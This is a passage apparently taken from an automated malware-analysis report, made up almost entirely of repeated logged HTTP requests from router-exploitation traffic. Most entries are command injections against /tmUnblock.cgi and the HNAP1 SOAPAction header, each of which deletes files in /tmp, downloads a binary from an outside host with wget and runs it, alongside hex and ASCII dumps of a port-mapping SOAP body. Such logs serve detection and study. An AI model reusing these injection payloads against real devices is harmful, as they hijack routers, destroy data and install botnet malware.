2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 